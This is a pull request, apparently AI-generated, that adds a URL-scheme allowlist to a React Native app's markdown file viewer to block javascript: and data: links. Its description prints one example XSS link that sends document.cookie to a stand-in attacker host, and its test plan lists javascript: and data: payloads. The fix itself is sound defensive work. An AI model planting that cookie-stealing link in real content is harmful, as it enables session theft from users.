### PR TITLE
security(viewer): block javascript:/data: in FileViewer markdown (#265)

### DIFF
--- a/src/screens/FileViewerScreen.tsx
+++ b/src/screens/FileViewerScreen.tsx
@@ -11,6 +11,8 @@ import { SafeAreaView } from 'react-native-safe-area-context';
 import { useNavigation, useRoute, RouteProp } from '@react-navigation/native';
 import { Ionicons } from '@expo/vector-icons';
 import Markdown from 'react-native-markdown-display';
+// eslint-disable-next-line @typescript-eslint/no-var-requires
+const MarkdownIt = require('markdown-it');
 
 import { RootStackParamList } from '../navigation/types';
 import { useTheme } from '../contexts/ThemeContext';
@@ -104,6 +106,15 @@ export default function FileViewerScreen() {
 
   const markdownStyles = useMemo(() => getMarkdownStyles(colors, isDark), [colors, isDark]);
 
+  const markdownItInstance = useMemo(() => {
+    const md = MarkdownIt({ typographer: true, linkify: true });
+    // Allow only safe URL schemes. Reject javascript:, data:, vbscript:, etc.
+    md.validateLink = (url: string) =>
+      /^(https?:|mailto:|tel:|#)/i.test(url) ||
+      !/^[a-z][a-z0-9+.-]*:/i.test(url);
+    return md;
+  }, []);
+
   return (
     <SafeAreaView edges={['top']} style={[styles.container, { backgroundColor: colors.background }]}>
       <View style={[styles.header, { borderBottomColor: colors.border, backgroundColor: colors.surface }]}>
@@ -140,7 +151,7 @@ export default function FileViewerScreen() {
           showsVerticalScrollIndicator
         >
           {mode === 'markdown' ? (
-            <Markdown style={markdownStyles}>{renderContent}</Markdown>
+            <Markdown style={markdownStyles} markdownit={markdownItInstance}>{renderContent}</Markdown>
           ) : (mode === 'neorg' || mode === 'org') && parsedNeorg ? (
             <NeorgRenderer blocks={parsedNeorg} />
           ) : (


### PR DESCRIPTION
## Summary
- \`FileViewerScreen\` now passes a custom markdown-it instance to \`<Markdown>\` with a strict \`validateLink\`.
- Allowed: \`http(s):\`, \`mailto:\`, \`tel:\`, \`#\` anchors, and relative URLs.
- Blocked: \`javascript:\`, \`data:\`, \`vbscript:\`, \`file:\`, anything else with a custom scheme.

Closes #265

## Why
Without a validator, an attacker who can place a markdown file in a viewable repo could embed a link like:
\`\`\`md
[Click](javascript:fetch('//attacker/?'+document.cookie))
\`\`\`
and have it become a tappable link. Mirrors the guard already used in \`NoteEditorScreen\`.

## Test plan
- [ ] \`https://example.com\` → tappable, opens browser
- [ ] \`mailto:a@b\` → opens mail
- [ ] \`javascript:alert(1)\` → not produced as link (rendered as raw text or stripped)
- [ ] \`data:text/html,...\` → blocked
- [ ] Relative \`#heading\` anchors still produced

🤖 Generated with [Claude Code](https://claude.com/claude-code)